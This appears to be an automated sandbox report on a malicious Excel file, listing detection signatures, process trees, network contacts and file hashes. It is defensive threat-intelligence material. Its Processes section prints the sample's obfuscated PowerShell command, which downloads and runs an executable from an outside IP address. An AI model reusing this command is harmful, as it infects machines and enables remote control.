Malware Analysis Report

2024-12-07 16:59

Sample ID 241113-c9eedsykgl
Target aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls
SHA256 aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf
Tags
defense_evasion discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf

Threat Level: Known bad

The file aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Blocklisted process makes network request

Evasion via Device Credential Deployment

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Uses Volume Shadow Copy service COM API

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy WMI provider

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Uses Task Scheduler COM API

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 02:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 02:46

Reported

2024-11-13 02:48

Platform

win7-20240903-en

Max time kernel

139s

Max time network

140s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\mstsc.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\wlanext.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
N/A N/A C:\Windows\SysWOW64\mstsc.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1976 set thread context of 2124 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 2124 set thread context of 3048 N/A C:\Windows\SysWOW64\svchost.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
PID 2124 set thread context of 2360 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mstsc.exe
PID 2360 set thread context of 3048 N/A C:\Windows\SysWOW64\mstsc.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wlanext.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mstsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \Registry\User\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 C:\Windows\SysWOW64\mstsc.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2732 wrote to memory of 2476 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 2732 wrote to memory of 2476 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 2732 wrote to memory of 2476 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 2732 wrote to memory of 2476 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 2476 wrote to memory of 876 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 876 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 876 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 876 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 768 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2476 wrote to memory of 768 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2476 wrote to memory of 768 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2476 wrote to memory of 768 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 768 wrote to memory of 1992 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 768 wrote to memory of 1992 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 768 wrote to memory of 1992 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 768 wrote to memory of 1992 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2476 wrote to memory of 1976 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 2476 wrote to memory of 1976 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 2476 wrote to memory of 1976 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 2476 wrote to memory of 1976 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 1976 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 1976 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 1976 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 1976 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 1976 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 3048 wrote to memory of 2360 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\mstsc.exe
PID 3048 wrote to memory of 2360 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\mstsc.exe
PID 3048 wrote to memory of 2360 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\mstsc.exe
PID 3048 wrote to memory of 2360 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\mstsc.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE

"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp"

C:\Users\Admin\AppData\Roaming\wlanext.exe

"C:\Users\Admin\AppData\Roaming\wlanext.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Users\Admin\AppData\Roaming\wlanext.exe"

C:\Windows\SysWOW64\mstsc.exe

"C:\Windows\SysWOW64\mstsc.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.82:80 r10.o.lencr.org tcp
US 107.173.4.61:80 107.173.4.61 tcp
KR 221.146.204.133:443 4t.gg tcp
US 107.173.4.61:80 107.173.4.61 tcp
US 107.173.4.61:80 107.173.4.61 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.sodatool.site udp
CN 122.152.214.209:80 www.sodatool.site tcp
US 8.8.8.8:53 www.wwwzbk.app udp
HK 202.95.12.144:80 www.wwwzbk.app tcp
US 8.8.8.8:53 www.sqlite.org udp
US 45.33.6.223:80 www.sqlite.org tcp

Files

memory/3048-1-0x000000007259D000-0x00000000725A8000-memory.dmp

memory/3048-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/3048-17-0x0000000002D30000-0x0000000002D32000-memory.dmp

memory/2732-16-0x0000000002100000-0x0000000002102000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 fca2d4075e78fd8330d5590ee560451b
SHA1 b7ab976b0f45facd4a29a6aded52515523cd756b
SHA256 9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689
SHA512 f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 278f2c9dc15ca7c48785ffb7a522f3b6
SHA1 826e17b66ae225807c37f1534623ee2120cf3666
SHA256 67a45783638fa4692d0d52305b3e2d4dd64dfddce09b049d64c8942b9a561661
SHA512 4c3f6e4f8d0c788b608fc73163c669e2b894ea9068fc01ba21187eeb924f2d203280250b5ca55d665c9e44a3806d952e3b375e7414a747423b40c484e5234ecb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 8cea8ad0055cfa7e2996bb974d07439d
SHA1 0f79068cf7f28aa67c12849457f6b73eb319125a
SHA256 975a4049d9052d356d7e8b98a12d146bb9f006e76df36ba7dbe4d265078e191a
SHA512 68dbc1e3cad1c472490000cbe5c9f0f5fb053ca0ed50fad15fc91144c5f4cddc2b8bf0df1db4802d13f45be366065de08b26784e3ff32bb1a5980be4db34f87a

C:\Users\Admin\AppData\Local\Temp\CabB210.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\seethebestthingswithgreatthingsbestthingswithgreatentry[1].hta

MD5 03ebca3f0b4171e32b0689a3410e79ad
SHA1 1e7b517e45f1b0e503e796bb6dcc7a6252f35364
SHA256 1d3307d98ef8b5e0743dc753388a3b8698a52783338bf8fe49042ad62ad98732
SHA512 a7b84ce6572f3e820cffe438c771b5c3bdd140fca78edb7d6a7217bb7bf57950168d025f5c6e634e482a4a99576367ada72e3d9e26891ab03901136f9ed74270

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 c25ae41143a3dc8db0136cd00b75e178
SHA1 c0c8d88e62eb1b3e759677512ed50a320df32479
SHA256 73d82479177fd2cf7b7c493b7120035eeb3f17e3eba5973ee427194cd201c754
SHA512 3d5e96b136faaab56f24f9fc216f30d418915169600e9a90ab934804f2f2ff8939e490f3098be3141fcde8b0ff151c6179c9ce7160b57f8e1c77e9b32d2ec8fe

\??\c:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline

MD5 cb25a753d2162468e70eb450ff86d8ed
SHA1 994be0e177cc763e04068fffea58d20e30dd327f
SHA256 52dafc3b411fc1f3f717745ef1c76029cae193d7fb6777f4c67cef223824fdd2
SHA512 b396add7928624ee470ed5fd66197222a0192a732054bdac5b0690587e2272e209e3ee91c57b26649527b158940c4538d63c494d7a2457f8bf1508fc9d0216cb

\??\c:\Users\Admin\AppData\Local\Temp\tnpx6mte.0.cs

MD5 4af98cbe7b888e1e92e1aa8a35732223
SHA1 75d54c91355c97fc9b1c3453efea5dccd817ed42
SHA256 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34
SHA512 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3

\??\c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp

MD5 5c851f4b3a74dc8112c0363e7a4c058b
SHA1 9efc91ddaf92b054bc744fce8fa49abb8487d06e
SHA256 c1f74a6fbb7152496a27ecb896ecc310c624f4672024766f3b7b6bac32957fab
SHA512 c5f9f6313edf4ef0055a0dd39191a0a70c4f9f51f2b6a7667a4a30e759d65f31a8817492ee53863e93f9750386db9cc399fefc55e5a2a53be15cdd0691cf2e4d

C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp

MD5 ceff02079ffeba9fe9071e2a8dc5c60b
SHA1 8ef32fde3068d74ff260594f4e81a9e722dd9c8a
SHA256 f2701121bba43e22f733ad8d9c0bc503b547f21fc95d352ca10d0819f7a32d0d
SHA512 8e0bcc1700b9ba4ec01d04baed103bb8c5a573b3aa2382eb4ef3ce0b194312314971542ec7399fe2a767da070ac0e3d8002f11c6bda0d3b7724c5d8823ee4f74

C:\Users\Admin\AppData\Local\Temp\tnpx6mte.dll

MD5 1a216f7b4404a7e76e9224ad3f4d0579
SHA1 97954f49e9a8c8b54c1542a8f916972443e5b389
SHA256 e257a1620aa98b569bcdb75cedbf2552f3d0a3e49df71007dc2a64526d15bb02
SHA512 45c7dc8ebd845f46931019b378a8a8333238adf77e73ad3c71be4843a11b6cdad56718d31adb08b6e1ac52f46966ab15c4664f281978238812a8a35fc3ff40a4

C:\Users\Admin\AppData\Local\Temp\tnpx6mte.pdb

MD5 7b95801062f5d47de9cc5e59dcc10462
SHA1 6d7e58750a67f796d6441a84538f32b0d481a95e
SHA256 1108177b5dac0f3dbb5fef753d33ff281e4a8015184b8962005c2f67eb12f009
SHA512 e6253dfef719f52fc44e88d2c26bccd168d1bc7aef5266cd7a39b9ccf67df83c7483f53b066fe1cf1715f4af70c9e51f9b3d76ed5b451854e891a02cf587375d

memory/3048-56-0x000000007259D000-0x00000000725A8000-memory.dmp

C:\Users\Admin\AppData\Roaming\wlanext.exe

MD5 7423e3013a2ca93513e9f1024dfe1cc8
SHA1 525281537f75c168ca4015df438bb83a7784931a
SHA256 8e3951372f996dd248695a54af7ff1a5cde1059689aa43d953712e6c0744c0df
SHA512 d5189a52b0cb9db2da33b7d8a61278e5e8edf0d1f075695dc5e99178e47b319658f8cf3e8339ee8bf24c548b3a38c01265250edf173f368dbea062ada78baea0

C:\Users\Admin\AppData\Local\Temp\juvenilely

MD5 5fc0e7bec89d9a4e021d88dd1cf731b2
SHA1 26ea02938cb1eb51a1ac601ab1b068a130cc3719
SHA256 532d407f3bdbd28145b385a4e15c80117e07e89f2ba16f1f620fe20cf213783d
SHA512 1c54091984fb41f43dbf7c7676184482ca853fb33e41780a323aec0ca21759e2a91af3bff30a947579811882d1c710a138e7e57dea2d9790e5092e68b768664f

memory/2124-79-0x0000000000400000-0x0000000000447000-memory.dmp

memory/2360-80-0x0000000000080000-0x00000000000C4000-memory.dmp

memory/2360-81-0x0000000000080000-0x00000000000C4000-memory.dmp

memory/3048-82-0x0000000007550000-0x0000000007679000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lxzluzp.zip

MD5 3bcbd3b08e4a8843fda34512623960a2
SHA1 244d3df69bbc09a43d4af3de5165f50506b8d7af
SHA256 7db638aa6b205aadba193dc7803a7e73eb07bbeeacbacad3a65978093e78673c
SHA512 914f366aab61ed2c13a87ee07e6a4b7aeffe4689c28014fab786244127852a19b7c1ae58bd8dd11840415035290373922f39b628c2409f68569cbf0b8a57e639

\Users\Admin\AppData\Local\Temp\sqlite3.dll

MD5 dda1b03a5cd2ca37c96b7daf5e3a8ed7
SHA1 c70e5f58e61980d39608f0795879bf012dbbbca2
SHA256 79f86c1edbbc69652a03a0f5667b3985bcf1e19f16fa3b8c7934e5b97ab8586d
SHA512 bf83648c9b5d6d65b2c8409d262a1b7421d2cb13d6c759ec5f352c2d1c5adff3ee2395250fbdfe3590f25fe96bf6b40c2d82a8e7eecaab03be2e6a398e83981f

memory/2360-119-0x0000000000080000-0x00000000000C4000-memory.dmp

memory/2360-120-0x0000000061E00000-0x0000000061ED2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 02:46

Reported

2024-11-13 02:48

Platform

win10v2004-20241007-en

Max time kernel

144s

Max time network

137s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3092 wrote to memory of 856 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 3092 wrote to memory of 856 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.82:80 r10.o.lencr.org tcp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
US 107.173.4.61:80 107.173.4.61 tcp
US 8.8.8.8:53 61.4.173.107.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/3092-1-0x00007FFDDADED000-0x00007FFDDADEE000-memory.dmp

memory/3092-3-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

